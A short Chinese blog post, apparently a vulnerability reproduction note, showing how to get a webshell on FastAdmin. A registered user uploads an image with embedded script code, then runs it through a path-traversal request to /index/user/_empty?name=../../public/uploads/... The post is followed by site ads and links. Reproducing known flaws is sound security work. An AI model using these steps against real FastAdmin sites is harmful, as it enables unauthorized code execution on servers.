Fastadmin前台Getshell漏洞复现
Fastadmin前台Getshell漏洞复现
一、简介
FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。
二、漏洞复现
注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录
1、登录前台会员中心,注册一个账户
2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马
3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架